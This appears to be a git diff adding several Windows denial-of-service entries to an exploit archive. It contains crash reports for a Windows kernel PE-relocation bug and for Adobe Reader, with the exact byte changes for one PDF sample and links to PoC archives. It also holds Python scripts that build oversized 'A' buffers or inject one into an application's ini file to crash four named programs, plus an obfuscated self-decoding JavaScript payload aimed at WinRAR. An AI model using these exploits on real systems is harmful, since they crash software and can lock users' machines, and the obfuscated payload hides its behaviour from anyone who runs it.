+We have encountered a Windows kernel crash in memcpy() called by nt!MiRelocateImage while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below:
+
+--- cut ---
+*** Fatal System Error: 0x00000050
+                       (0xFFFFF8017519A200,0x0000000000000000,0xFFFFF801713CF660,0x0000000000000000)
+
+A fatal system error has occurred.
+
+[...]
+
+*******************************************************************************
+*                                                                             *
+*                        Bugcheck Analysis                                    *
+*                                                                             *
+*******************************************************************************
+
+PAGE_FAULT_IN_NONPAGED_AREA (50)
+Invalid system memory was referenced.  This cannot be protected by try-except.
+Typically the address is just plain bad or it is pointing at freed memory.
+Arguments:
+Arg1: fffff8017519a200, memory referenced.
+Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
+Arg3: fffff801713cf660, If non-zero, the instruction address which referenced the bad memory
+	address.
+Arg4: 0000000000000000, (reserved)
+
+[...]
+
+TRAP_FRAME:  ffffc50241846ba0 -- (.trap 0xffffc50241846ba0)
+NOTE: The trap frame does not contain all registers.
+Some register values may be zeroed or incorrect.
+rax=ffffcf84d2228de0 rbx=0000000000000000 rcx=ffffcf84d2228fb8
+rdx=0000287ca2f71248 rsi=0000000000000000 rdi=0000000000000000
+rip=fffff801713cf660 rsp=ffffc50241846d38 rbp=ffffc50241846fb0
+ r8=000000000000000c  r9=0000000000000001 r10=00000000ffffffff
+r11=ffffcf84d2228fb8 r12=0000000000000000 r13=0000000000000000
+r14=0000000000000000 r15=0000000000000000
+iopl=0         nv up ei pl nz na pe cy
+nt!memcpy+0x20:
+fffff801`713cf660 488b0411        mov     rax,qword ptr [rcx+rdx] ds:fffff801`7519a200=????????????????
+Resetting default scope
+
+LAST_CONTROL_TRANSFER:  from fffff801714a6642 to fffff801713c46a0
+
+STACK_TEXT:  
+ffffc502`41846158 fffff801`714a6642 : fffff801`7519a200 00000000`00000003 ffffc502`418462c0 fffff801`71322be0 : nt!DbgBreakPointWithStatus
+ffffc502`41846160 fffff801`714a5d32 : fffff801`00000003 ffffc502`418462c0 fffff801`713d0f60 00000000`00000050 : nt!KiBugCheckDebugBreak+0x12
+ffffc502`418461c0 fffff801`713bca07 : ffffce67`3399cf80 fffff801`714d0110 00000000`00000000 fffff801`71663900 : nt!KeBugCheck2+0x952
+ffffc502`418468c0 fffff801`713e0161 : 00000000`00000050 fffff801`7519a200 00000000`00000000 ffffc502`41846ba0 : nt!KeBugCheckEx+0x107
+ffffc502`41846900 fffff801`7127aaef : 00000000`00000000 00000000`00000000 00000000`00000000 fffff801`7519a200 : nt!MiSystemFault+0x1d3171
+ffffc502`41846a00 fffff801`713ca920 : ffffcf84`cb274000 fffff801`713c79e5 00000000`00000000 fffff801`751a0c00 : nt!MmAccessFault+0x34f
+ffffc502`41846ba0 fffff801`713cf660 : fffff801`7188246d 00000000`6cc30000 ffffc502`41846fb0 ffffcf84`d2228d70 : nt!KiPageFault+0x360
+ffffc502`41846d38 fffff801`7188246d : 00000000`6cc30000 ffffc502`41846fb0 ffffcf84`d2228d70 00000000`00000000 : nt!memcpy+0x20
+ffffc502`41846d40 fffff801`717fc8a3 : ffffc502`41847180 ffffc502`41847180 ffffc502`41846fb0 ffffc502`41847180 : nt!MiRelocateImage+0x3dd
+ffffc502`41846eb0 fffff801`717dca20 : ffff9d05`96f58160 ffffc502`41847180 ffffc502`41847180 ffff9d05`96f58130 : nt!MiCreateNewSection+0x5ef
+ffffc502`41847010 fffff801`717dcd24 : ffffc502`41847040 ffffcf84`d24b8b00 ffff9d05`96f58160 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0
+ffffc502`41847100 fffff801`717dc37f : 00000000`11000000 ffffc502`418474c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4
+ffffc502`41847280 fffff801`717dc110 : 00000000`0828cf48 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff
+ffffc502`41847360 fffff801`713ce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60
+ffffc502`418473d0 00007ffb`a3edc9a4 : 00007ffb`a1c71ae7 00000000`00000000 00000000`00000001 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25
+00000000`0828ced8 00007ffb`a1c71ae7 : 00000000`00000000 00000000`00000001 00000000`00000000 00000000`00000000 : ntdll!NtCreateSection+0x14
+00000000`0828cee0 00007ffb`a1c75640 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7
+00000000`0828d110 00007ffb`a1c5c41d : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0
+00000000`0828d180 00007ffb`a22603d1 : 00000000`055c1640 00000000`00000000 00006d1c`2a8cc01b 00007ffb`a29c643e : KERNELBASE!GetFileVersionInfoSizeExW+0x3d
+00000000`0828d1e0 00007ffb`a226035c : 00000000`00002234 00007ffb`a29cdba3 00000000`00002234 00000000`00000000 : SHELL32!_LoadVersionInfo+0x39
+00000000`0828d250 00007ffb`a155c1c1 : 00000000`00000000 00000000`00000000 00000000`00000020 00000000`40040000 : SHELL32!CVersionPropertyStore::Initialize+0x2c
+
+[...]
+--- cut ---
+
+The issue reproduces on Windows 8.1, Windows 10 and their corresponding Server editions (32-bit and 64-bit, Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Due to the nature of the bug (OOB read), it could be also potentially exploited as an information disclosure primitive.
+
+We haven't managed to significantly minimize the test cases, but we determined that the crash is related to the invalid value of the Base Relocation Table directory address in the PE headers.
+
+Attached is an archive with two proof-of-concept PE images and the corresponding original files used to generate them. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47489.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47494.py b/exploits/windows/dos/47494.py
new file mode 100755
index 000000000..b27d37927
--- /dev/null
+++ b/exploits/windows/dos/47494.py
@@ -0,0 +1,32 @@
+# Exploit Title: SpotAuditor 5.3.1.0 - Denial of Service
+# Author: Sanjana Shetty
+# Date: 2019-10-13
+# Version: SpotAuditor 5.3.1.0
+# Vendor Homepage: http://www.nsauditor.com
+# Software link: http://spotauditor.nsauditor.com/
+
+
+# <POC by Sanjana Shetty>
+# Steps
+
+[1] Install the SpotAuditor software
+
+[2] Access the register functionality
+
+[3] In the name field enter 5000 A's and press enter, this will crash the
+application.
+
+==== use below script to create 5000 A's to a text file and copy it to the name field============
+
+
+print ("# POC by sanjana shetty")
+
+try:
+       f = open("file.txt","w")
+       junk =  "\x41" * 5000
+       f.write(junk)
+       print ("done")
+
+except (Exception, e):
+
+      print ("#error - ") + str(e)
\ No newline at end of file
diff --git a/exploits/windows/dos/47495.py b/exploits/windows/dos/47495.py
new file mode 100755
index 000000000..e72529e10
--- /dev/null
+++ b/exploits/windows/dos/47495.py
@@ -0,0 +1,31 @@
+# Exploit Title: ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service
+# Date: 2019-10-12
+# Vendor Homepage: https://www.actfax.com/
+# Software Link :  https://www.actfax.com/download/actfax_setup_x64_ge.exe
+# Exploit Author: Achilles
+# Tested Version: 6.92
+# Tested on: Windows 7 x64
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+ 
+# Steps to Produce the Crash: 
+# 1.- Run python code : ActiveFax_Server.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open ActiveFaxServer.exe
+# 4.- Open the Pop3 Server Config
+# 5.- Press New
+# 6.- Paste the content of EVIL.txt into the field: 'POP3 Server Address and Login and Password'
+# 7.- Press ok Twice
+# 8.- And you will see a crash.
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 6000
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/47525.txt b/exploits/windows/dos/47525.txt
new file mode 100644
index 000000000..117a45982
--- /dev/null
+++ b/exploits/windows/dos/47525.txt
@@ -0,0 +1,73 @@
+# Exploit Title: winrar 5.80 64bit - Denial of Service
+# Date: 2019-10-19
+# Exploit Author: alblalawi
+# Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe
+# Version: 5.80
+# Tested on: Microsoft Windows Version 10.0.18362.418 64bit
+
+# 1- open winrar or any file.rar
+# 2- help
+# 3- help topics
+# 4- Drag the exploit to the window
+
+# Save the content html
+
+
+<script type="text/javascript">
+//<![CDATA[
+<!--
+var x="function f(x){var i,o=\"\",l=x.length;for(i=l-1;i>=0;i--) {try{o+=x.c" +
+"harAt(i);}catch(e){}}return o;}f(\")\\\"function f(x,y){var i,o=\\\"\\\\\\\""+
+"\\\\,l=x.length;for(i=0;i<l;i++){if(i==28)y+=i;y%=127;o+=String.fromCharCod" +
+"e(x.charCodeAt(i)^(y++));}return o;}f(\\\"\\\\xr}jMDLW\\\\\\\\nRTN\\\\\\\\\\"+
+"\\\\\\LFE\\\\\\\\004\\\\\\\\017\\\\\\\\022GD\\\\\\\\\\\\\\\\^\\\\\\\\rhGjYh" +
+"83#9y2/(-s:\\\\\\\\021\\\\\\\\024\\\\\\\\013\\\\\\\\025Y9D\\\\\\\\037E\\\\\\"+
+"\\034\\\\\\\\013F\\\\\\\\017\\\\\\\\002\\\\\\\\003\\\\\\\\037\\\\\\\\021\\\\"+
+"\\\\005\\\\\\\\033\\\\\\\\021\\\\\\\\030\\\\\\\\020*UX\\\\\\\\032\\\\\\\\02" +
+"5\\\\\\\\025\\\\\\\\010\\\\\\\\030\\\\\\\\020t<^!M@;?T+4W~Q`3}tfr4}bch4\\\\" +
+"\\\\177jith\\\\\\\\\\\"\\\\|\\\\\\\\003g[TLTB[u\\\\\\\\010\\\\\\\\013OB@[U_" +
+"F\\\\\\\\016h\\\\\\\\027\\\\\\\\033\\\\\\\\006d\\\\\\\\033\\\\\\\\004gNaP\\" +
+"\\\\\\003\\\\\\\\\\\"\\\\.&:z\\\\\\\\0314\\\\\\\\033&u9(>$>;p=3=3 70=d\\\\\\"+
+"\\006y\\\\\\\\n\\\\\\\\037\\\\\\\\r<\\\\\\\\022\\\\\\\\010\\\\\\\\022\\\\\\" +
+"\\027J \\\\\\\\010\\\\\\\\004\\\\\\\\007\\\\\\\\r\\\\\\\\0177NS2\\\\\\\\035" +
+",\\\\\\\\037.\\\\\\\\001(\\\\\\\\033VWX=\\\\\\\\023\\\\\\\\026\\\\\\\\\\\\\\"+
+"\\\\\\\\\\016\\\\\\\\026l!\\\\\\\\\\\"\\\\_vYh'()Ynx-}g|1/3Wgsvl|Uyvx}k\\\\" +
+"\\\\010}\\\\\\\\000tWFTNX]\\\\\\\\004xDHBCl\\\\\\\\023\\\\\\\\033\\\\\\\\02" +
+"3\\\\\\\\024iDkV\\\\\\\\031\\\\\\\\032\\\\\\\\033\\\\\\\\177\\\\\\\\\\\\\\\\"+
+"RS`2*/j\\\\\\\\0273)`\\\\\\\\025h\\\\\\\\027n\\\\\\\\021l,=5|6,0\\\\\\\\nu\\"+
+"\\\\\\004{\\\\\\\\006yu}~\\\\\\\\003\\\\\\\\022=\\\\\\\\014CDE5\\\\\\\\002\\"+
+"\\\\\\034I\\\\\\\\031\\\\\\\\003\\\\\\\\000MSO>\\\\\\\\036\\\\\\\\006\\\\\\" +
+"\\033\\\\\\\\035\\\\\\\\033\\\\\\\\021WXYZ'\\\\\\\\016!\\\\\\\\020 !\\\\\\\\"+
+"\\\"\\\\_vYh;'ziye}z1LcN}(:tx|`$GnAp#\\\\\\\\017IVNH\\\\\\\\033\\\\\\\\004\\"+
+"\\\\\\016\\\\\\\\023\\\\\\\\031\\\\\\\\021\\\"\\\\,28)\\\"(f};)lo,0(rtsbus." +
+"o nruter};)i(tArahc.x=+o{)--i;0=>i;1-l=i(rof}}{)e(hctac};l=+l;x=+x{yrt{)401" +
+"=!)31/l(tAedoCrahc.x(elihw;lo=l,htgnel.x=lo,\\\"\\\"=o,i rav{)x(f noitcnuf\""+
+")"                                                                           ;
+while(x=eval(x));
+//-->
+//]]>
+</script>
+<script type="text/javascript">
+//<![CDATA[
+<!--
+var x="function f(x){var i,o=\"\",ol=x.length,l=ol;while(x.charCodeAt(l/13)!" +
+"=48){try{x+=x;l+=l;}catch(e){}}for(i=l-1;i>=0;i--){o+=x.charAt(i);}return o" +
+".substr(0,ol);}f(\")19,\\\"ZPdw771\\\\b77-0xjk-7=3771\\\\sp,cw$520\\\\:330\\"+
+"\\xg030\\\\jj9%530\\\\b000\\\\XZUUVX620\\\\LP\\\\\\\\Pr\\\\610\\\\KOHD400\\" +
+"\\620\\\\720\\\\\\\\\\\\WOWGPr\\\\530\\\\NClAauFkD,$gqutdr/3-ig~`|)rkanwbo2" +
+"30\\\\t\\\\ 520\\\\&310\\\\$n\\\\200\\\\)230\\\\/000\\\\-K530\\\\310\\\\310" +
+"\\\\n\\\\630\\\\010\\\\IULFW620\\\\600\\\\400\\\\700\\\\520\\\\=*100\\\\(70" +
+"0\\\\4500\\\\*310\\\\-u}xy8pt~}|{771\\\\itg/e771\\\\sb|`V620\\\\530\\\\NT\\" +
+"\\\\\\MdYjGh010\\\\@TVI[O410\\\\620\\\\n\\\\330\\\\ZB@CQA200\\\\SAijArGhEec" +
+"J{HaN*2S?9t)V)5,&waedtbn\\\\!010\\\\'420\\\\%n\\\\+r\\\\U]XY030\\\\PT^]\\\\" +
+"\\\\[ZY]GZEr\\\\CYQ@b~4|);/pw$:2'610\\\\?410\\\\=220\\\\vn720\\\\h520\\\\hz" +
+"f7!%$4\\\"\\\\730\\\\L\\\\\\\\JOfWdEjN420\\\\230\\\\230\\\\IU710\\\\@BE_IG]" +
+"AHyV771\\\\430\\\\300\\\\|kntnxixnv|:`kwe2S3h|r~)|wowgp>o\\\\\\\\410\\\\!B7" +
+"30\\\\330\\\\430\\\\020\\\\K030\\\\)600\\\\/L530\\\\530\\\\330\\\\600\\\\QN" +
+"C400\\\\500\\\\r\\\\320\\\\710\\\\720\\\\320\\\\M620\\\\710\\\\500\\\\2+>3?" +
+"\\\"(f};o nruter};))++y(^)i(tAedoCrahc.x(edoCrahCmorf.gnirtS=+o;721=%y{)++i" +
+";l<i;0=i(rof;htgnel.x=l,\\\"\\\"=o,i rav{)y,x(f noitcnuf\")"                 ;
+while(x=eval(x));
+//-->
+//]]>
+</script>
\ No newline at end of file
diff --git a/exploits/windows/dos/47528.txt b/exploits/windows/dos/47528.txt
new file mode 100644
index 000000000..35860811a
--- /dev/null
+++ b/exploits/windows/dos/47528.txt
@@ -0,0 +1,85 @@
+We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
+
+--- cut ---
+(7f2c.8be8): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000080 ebx=00001b52 ecx=00000080 edx=00000080 esi=00000001 edi=6f587000
+eip=6a005324 esp=050fbc14 ebp=050fbc34 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
+JP2KLib!IJP2KException::GetErrString+0x3224:
+6a005324 8817            mov     byte ptr [edi],dl          ds:002b:6f587000=??
+
+0:000> kb
+ # ChildEBP RetAddr  Args to Child              
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00 050fbc34 6a0030e8 00001b52 00001b53 00000000 JP2KLib!IJP2KException::GetErrString+0x3224
+01 050fbcb0 69ff3bf0 0000000a 000002ce 00000001 JP2KLib!IJP2KException::GetErrString+0xfe8
+02 050fbd44 69ff4132 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xe9d0
+03 050fbda0 69ff43f9 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xef12
+04 050fbdc8 69ff37bc 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xf1d9
+05 050fbe7c 69ff31eb 050fbf88 0000000d 00000008 JP2KLib!JP2KCopyRect+0xe59c
+06 050fbebc 6a005d8a 0000000d 00000008 000000ff JP2KLib!JP2KCopyRect+0xdfcb
+07 050fbf1c 5f721b53 62c74e88 0000000d 00000008 JP2KLib!JP2KImageDecodeImageRegion+0x2a
+08 050fbf9c 5f71544b 6ad22fac 050fbfcc 5f115889 AcroRd32!AX_PDXlateToHostEx+0x343e93
+09 050fbfa8 5f115889 6ad22fac 62c7cfb0 5f1157f0 AcroRd32!AX_PDXlateToHostEx+0x33778b
+0a 050fbfcc 5f115783 6ad0efe0 00000001 0000001b AcroRd32!DllCanUnloadNow+0x4c929
+0b 050fbfec 5f561d7a 050fc010 6ad0efe0 0000001b AcroRd32!DllCanUnloadNow+0x4c823
+0c 050fc030 5f24afc8 c0020000 00000004 6ad0efe0 AcroRd32!AX_PDXlateToHostEx+0x1840ba
+0d 050fc384 5f24a506 050fc3e0 53406a98 95e3efd6 AcroRd32!DllCanUnloadNow+0x182068
+0e 050fc3bc 5f24a3e1 050fc3e0 53406a98 050fc44c AcroRd32!DllCanUnloadNow+0x1815a6
+0f 050fc428 5f2493a8 c0020000 00000004 53406a98 AcroRd32!DllCanUnloadNow+0x181481
+10 050fc888 5f2468f7 050fcb8c 686e45ac c0020000 AcroRd32!DllCanUnloadNow+0x180448
+11 050fe068 5f246575 686e45ac c0020000 00000004 AcroRd32!DllCanUnloadNow+0x17d997
+12 050fe138 5f22a25c 95e3ce72 5d91af78 00000000 AcroRd32!DllCanUnloadNow+0x17d615
+13 050fe218 5f229057 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x1612fc
+14 050fe264 5f21c183 5d91af78 00000001 00000000 AcroRd32!DllCanUnloadNow+0x1600f7
+15 050fe3d8 5f21ba97 553e6dbc 00000001 6a169ef8 AcroRd32!DllCanUnloadNow+0x153223
+16 050fe440 5f219281 95e3c8aa 5323efc8 5adccea8 AcroRd32!DllCanUnloadNow+0x152b37
+17 050fe4c0 5f218dae 6a169ef8 65a08f40 5adcceb8 AcroRd32!DllCanUnloadNow+0x150321
+18 050fe4fc 5f218d07 6a169ef8 65a08f40 5adcceb8 AcroRd32!DllCanUnloadNow+0x14fe4e
+19 050fe584 5f2182ee 6a169ef8 65a08f40 050fe7b8 AcroRd32!DllCanUnloadNow+0x14fda7
+1a 050fe5c0 5f216f02 6a169ef8 65a08f40 050fe7b8 AcroRd32!DllCanUnloadNow+0x14f38e
+1b 050fe884 5f215d98 6a169ef8 050fe918 050fe968 AcroRd32!DllCanUnloadNow+0x14dfa2
+1c 050fe988 5f2143b8 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14ce38
+1d 050fe9ec 5f21414d 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14b458
+1e 050fea0c 5f212d3c 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14b1ed
+1f 050feac4 5f212762 00000001 00000000 95e3c776 AcroRd32!DllCanUnloadNow+0x149ddc
+20 050feb1c 5f21257a 7d8b4ef0 00000001 95e3c7ea AcroRd32!DllCanUnloadNow+0x149802
+21 050feb80 5f2122ff 050fec74 95e3c0fe 80882fa0 AcroRd32!DllCanUnloadNow+0x14961a
+22 050fec94 5f0d687c 80882fa0 5f0d67a0 00000000 AcroRd32!DllCanUnloadNow+0x14939f
+23 050fecac 5f0d678f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd91c
+24 050fecc8 745de0bb 00180a60 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd82f
+25 050fecf4 745e8849 5f0d66d0 00180a60 0000000f USER32!_InternalCallWinProc+0x2b
+26 050fed18 745eb145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20
+27 050fede8 745d8503 5f0d66d0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be
+28 050fee50 745d8aa0 147683c0 00000000 0000000f USER32!DispatchClientMessage+0x1b3
+29 050fee98 77371a6d 050feeb4 00000020 050fef14 USER32!__fnDWORD+0x50
+2a 050feed0 745d91ee 050fef64 5a5cb65c 18836dd8 ntdll!KiUserCallbackDispatcher+0x4d
+2b 050fef24 745d8c20 5f535978 050fef48 5f0eda6d USER32!DispatchMessageWorker+0x5be
+2c 050fef30 5f0eda6d 050fef64 18836dd8 18836dd8 USER32!DispatchMessageW+0x10
+2d 050fef48 5f0ed89e 050fef64 95e3c3d6 18836dd8 AcroRd32!DllCanUnloadNow+0x24b0d
+2e 050fefbc 5f0ed744 95e3c39e 18836dd8 00000000 AcroRd32!DllCanUnloadNow+0x2493e
+2f 050feff4 5f07c575 95e3dc0e 17484ff8 00000000 AcroRd32!DllCanUnloadNow+0x247e4
+30 050ff064 5f07bf81 5f050000 00110000 17484ff8 AcroRd32!AcroWinMainSandbox+0x775
+31 050ff484 0011783d 5f050000 00110000 17484ff8 AcroRd32!AcroWinMainSandbox+0x181
+32 050ff850 002201aa 00110000 00000000 0bd5b3f2 AcroRd32_exe+0x783d
+33 050ff89c 76698674 04f5f000 76698650 c83dc0c6 AcroRd32_exe!AcroRd32IsBrokerProcess+0x992da
+34 050ff8b0 77365e17 04f5f000 07a6f6f5 00000000 KERNEL32!BaseThreadInitThunk+0x24
+35 050ff8f8 77365de7 ffffffff 7738ad9e 00000000 ntdll!__RtlUserThreadStart+0x2f
+36 050ff908 00000000 00111390 04f5f000 00000000 ntdll!_RtlUserThreadStart+0x1b
+--- cut ---
+
+Notes:
+
+- Reproduces on Adobe Acrobat Reader DC (2019.012.20036) on Windows 10, with and without PageHeap enabled.
+
+- The crash occurs immediately after opening the PDF document, and is caused by attempting to write data outside of a heap-based buffer.
+
+- Attached samples: poc.pdf (crashing file), original.pdf (original file).
+
+- We have minimized the difference between the original and mutated files down to 5 bytes inside of a binary JP2 image stream: 4 bytes at offset 0x195 changed from <FF FF E0 00> to <00 00 00 C0>, and 1 byte at offset 0x1ED changed from <0x53> to <0x5B>.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47528.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47563.py b/exploits/windows/dos/47563.py
new file mode 100755
index 000000000..169626d57
--- /dev/null
+++ b/exploits/windows/dos/47563.py
@@ -0,0 +1,28 @@
+# Exploit Title: WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service
+# Date: 2019-10-30
+# Vendor Homepage:https://www.alloksoft.com/
+# Software Link:  https://www.alloksoft.com/wmv.htm
+# Exploit Author: Nithoshitha S
+# Tested Version: v4.6.1217
+# Tested on: Windows 7 x64
+#            Windows XP SP3
+
+# 1.- Run python code :poc.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open  WMV to AVI MPEG DVD WMV Convertor and Click 'EnterKey'
+# 4.- Paste the content of EVIL.txt into the Field: 'License Name and License Code'
+# 5.- Click 'OK' and you will see a crash.
+
+# poc.py
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+f=open("Evil.txt","w")
+print "[+] Creating %s bytes evil payload.." %len(buffer)
+f.write(buffer)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/47586.py b/exploits/windows/dos/47586.py
new file mode 100755
index 000000000..9551ed2b8
--- /dev/null
+++ b/exploits/windows/dos/47586.py
@@ -0,0 +1,29 @@
+# Exploit Title:  FileOptimizer 14.00.2524 - Denial of Service (PoC)
+# Date: 2019-11-04
+# Exploit Author: Chase Hatch (SYANiDE)
+# Vendor Homepage: https://sourceforge.net/projects/nikkhokkho/
+# Software Link: https://sourceforge.net/projects/nikkhokkho/files/FileOptimizer/14.00.2524/FileOptimizerSetup.exe/download
+# Version: 14.00.2524
+# Tested on: Windows 7 Ultimate x86 SP0
+# CVE : none
+
+## Steps to reproduce
+## Open application for the first time so it generates "FileOptimizer32.ini" in the install directory
+## Run the PoC
+## Open FileOptimizer again, navigating to "Optimize" / "Options".
+## Click OK to crash
+
+#! /usr/bin/env python
+import os, sys, re
+
+test="TempDirectory="  # variable/str in config file to replace with buffer
+dir = "C:\\Program Files\\FileOptimizer\\"
+file = "FileOptimizer32.ini"
+
+sploit = "A"*5000
+
+temp = open(dir+file,'r').read()
+temp2 = re.sub(test, test + sploit, temp) 
+with open(dir+file,'w') as F:
+    F.write(temp2)
+    F.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/47609.txt b/exploits/windows/dos/47609.txt
new file mode 100644
index 000000000..adad85890
--- /dev/null
+++ b/exploits/windows/dos/47609.txt
@@ -0,0 +1,81 @@
+We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
+
+--- cut ---
+(88e4.30f4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000001 ebx=0478be34 ecx=00000000 edx=c0c0c0c0 esi=00000000 edi=00000000
+eip=5fdc2341 esp=0478bd24 ebp=0478bd54 iopl=0         nv up ei pl zr na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246
+AcroRd32!CTJPEGTiledContentWriter::operator=+0x147e1:
+5fdc2341 8a4a04          mov     cl,byte ptr [edx+4]        ds:002b:c0c0c0c4=??
+
+0:000> kb
+ # ChildEBP RetAddr  Args to Child              
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00 0478bd54 5fdb1157 0478be48 ceb1c57a 68754f88 AcroRd32!CTJPEGTiledContentWriter::operator=+0x147e1
+01 0478bea0 5fdafd04 68754f88 00000002 687fefe8 AcroRd32!CTJPEGTiledContentWriter::operator=+0x35f7
+02 0478bed8 5fda234f 5f198f54 5f198f54 68504fb8 AcroRd32!CTJPEGTiledContentWriter::operator=+0x21a4
+03 0478beec 5fd95227 68504fb8 00000044 684fcf40 AcroRd32!AX_PDXlateToHostEx+0x34468f
+04 0478bfa0 5f795889 5f198f54 590b4fb0 5f7957f0 AcroRd32!AX_PDXlateToHostEx+0x337567
+05 0478bfc4 5f795783 4d346ff8 00000001 00000001 AcroRd32!DllCanUnloadNow+0x4c929
+06 0478bfe4 5fbe1d7a 0478c008 4d346ff8 00000001 AcroRd32!DllCanUnloadNow+0x4c823
+07 0478c028 5f8cafc8 c0020000 00000001 4d346ff8 AcroRd32!AX_PDXlateToHostEx+0x1840ba
+08 0478c37c 5f8ca506 0478c3d8 7492ea98 ceb1b86e AcroRd32!DllCanUnloadNow+0x182068
+09 0478c3b4 5f8ca3e1 0478c3d8 7492ea98 0478c444 AcroRd32!DllCanUnloadNow+0x1815a6
+0a 0478c420 5f8c93a8 c0020000 00000001 7492ea98 AcroRd32!DllCanUnloadNow+0x181481
+0b 0478c880 5f8c68f7 0478cb84 6856c5ac c0020000 AcroRd32!DllCanUnloadNow+0x180448
+0c 0478e060 5f8c6575 6856c5ac c0020000 00000001 AcroRd32!DllCanUnloadNow+0x17d997
+0d 0478e130 5f8aa25c ceb199ca 45e6ef78 00000000 AcroRd32!DllCanUnloadNow+0x17d615
+0e 0478e210 5f8a9057 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x1612fc
+0f 0478e25c 5f89c183 45e6ef78 00000001 00000000 AcroRd32!DllCanUnloadNow+0x1600f7
+10 0478e3d0 5f89ba97 67fccdbc 00000001 5ef9cef8 AcroRd32!DllCanUnloadNow+0x153223
+11 0478e438 5f899281 ceb19f62 6fca6fc8 823c2ea8 AcroRd32!DllCanUnloadNow+0x152b37
+12 0478e4b8 5f898dae 5ef9cef8 5d9eaf40 823c2eb8 AcroRd32!DllCanUnloadNow+0x150321
+13 0478e4f4 5f898d07 5ef9cef8 5d9eaf40 823c2eb8 AcroRd32!DllCanUnloadNow+0x14fe4e
+14 0478e57c 5f8982ee 5ef9cef8 5d9eaf40 0478e7b0 AcroRd32!DllCanUnloadNow+0x14fda7
+15 0478e5b8 5f896f02 5ef9cef8 5d9eaf40 0478e7b0 AcroRd32!DllCanUnloadNow+0x14f38e
+16 0478e87c 5f895d98 5ef9cef8 0478e910 0478e960 AcroRd32!DllCanUnloadNow+0x14dfa2
+17 0478e980 5f895175 5ef9cef8 0478eab0 00000000 AcroRd32!DllCanUnloadNow+0x14ce38
+18 0478ead4 5f8942ba 5ef9cef8 0478ebd8 00000000 AcroRd32!DllCanUnloadNow+0x14c215
+19 0478eb34 5f89414d 5ef9cef8 0478ebd8 00000000 AcroRd32!DllCanUnloadNow+0x14b35a
+1a 0478eb54 5f892d3c 5ef9cef8 0478ebd8 00000000 AcroRd32!DllCanUnloadNow+0x14b1ed
+1b 0478ec0c 5f892762 00000001 00000000 ceb197be AcroRd32!DllCanUnloadNow+0x149ddc
+1c 0478ec64 5f89257a 3f3fcef0 00000001 ceb19712 AcroRd32!DllCanUnloadNow+0x149802
+1d 0478ecc8 5f8922ff 0478edbc ceb19606 8355afa0 AcroRd32!DllCanUnloadNow+0x14961a
